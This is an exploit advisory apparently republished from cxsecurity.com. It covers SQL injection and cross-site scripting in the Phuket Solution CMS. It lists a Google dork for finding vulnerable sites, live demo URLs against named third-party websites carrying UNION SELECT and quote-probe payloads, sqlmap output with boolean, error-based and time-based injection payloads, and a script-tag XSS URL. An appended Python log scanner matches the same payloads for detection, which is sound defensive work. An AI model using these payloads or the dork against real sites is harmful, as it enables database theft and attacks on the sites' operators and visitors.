PHUKET SOLUTIONCMS SQL Injection and XSS Vulnerability
2020-10-05 06:38:40 Author: cxsecurity.com


#Exploit Title: PHUKET SOLUTIONCMS SQL Injection and XSS Vulnerability
#Date: 2020-10-04
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: www.phuketsolution.com
#Google Dork:" Powered by Phuket Solution" or "Developed by Phuket Solution" or "Designed & Developed by Phuket Designer"
#Category: webapps
#Tested On: windows 10, Firefox
#Software Link: https://www.phuketsolution.com/portfolio.html

SQL Injection

Demo: http://henryscollection.com/product.php?products=-748%27%20UNION%20SELECT%201,2,3,4,user(),database(),7--%20-
Demo: http://www.theattitudeclub.com/saturdayscondo/themeweb/news-detail.php?id=75

[SQL Injection Vulnerability]

Demo: https://www.sawasdeephuketproperty.com/properties-list.php?property-types=1&types=2%27

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: property-types (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: property-types=1 AND 6120=6120&types=2
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: property-types=1 AND (SELECT 9297 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9297=9297,1))),0x717a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&types=2
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: property-types=1 AND (SELECT 8964 FROM (SELECT(SLEEP(5)))pKeR)&types=2
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0

################################################################################

Cross Site Scripting (XSS)

Demo: https://www.sawasdeephuketproperty.com/properties-list.php?property-types=1&types=2&location=&prices=&bedroom=&code=%22%2F%3E%3Cscript%3Ealert%28%22PywebSecurity%22%29%3C%2Fscript%3E%3E

*********************************************************
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************
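
For log triage, the payload classes shown in the demo URLs and sqlmap output above can be matched per query parameter after percent-decoding. This is an added example, not part of the original advisory: the rule names, log format and sample log lines are constructed assumptions, and the matching only supports detection (the fix is parameterized queries and output encoding in the application).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One rule per payload class visible in the advisory's demo URLs and sqlmap output.
RULES = {
    "sqli-quote-probe": re.compile(r"^-?\d+'$"),  # e.g. types=2'
    "sqli-union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "sqli-boolean": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I),
    "sqli-error": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "sqli-time": re.compile(r"\bsleep\s*\(\s*\d", re.I),
    "xss-script": re.compile(r"<\s*script\b", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return sorted (parameter, rule) pairs found in one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    hits = set()
    # parse_qsl percent-decodes each value, so encoded payloads are matched in clear.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        hits.update((name, rule) for rule, rx in RULES.items() if rx.search(value))
    return sorted(hits)

# Constructed log lines (documentation IP range, combined log format); the query
# strings reuse the parameter names and payload shapes shown in the advisory.
_P = '203.0.113.7 - - [04/Oct/2020:10:00:0%d +0000] "GET /properties-list.php?%s HTTP/1.1" 200 5120'
SAMPLE_LOG = [_P % (i, q) for i, q in enumerate([
    "property-types=1&types=2&location=&prices=&bedroom=&code=A12",  # benign
    "property-types=1&types=2%27",
    "property-types=1%20AND%206120=6120&types=2",
    "property-types=1%20AND%20(SELECT%208964%20FROM%20(SELECT(SLEEP(5)))pKeR)&types=2",
    "property-types=1%20AND%20(SELECT%209297%20FROM(SELECT%20COUNT(*),CONCAT(0x71,"
    "FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)&types=2",
    "products=-748%27%20UNION%20SELECT%201,2,3,4,user(),database(),7--%20-",
    "property-types=1&types=2&code=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E",
])]

def scan(lines):
    """Map line index -> hits, skipping lines with no match."""
    return {i: h for i, line in enumerate(lines) if (h := classify(line))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```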



 


Copyright 2020, cxsecurity.com



Article source: https://cxsecurity.com/issue/WLB-2020100023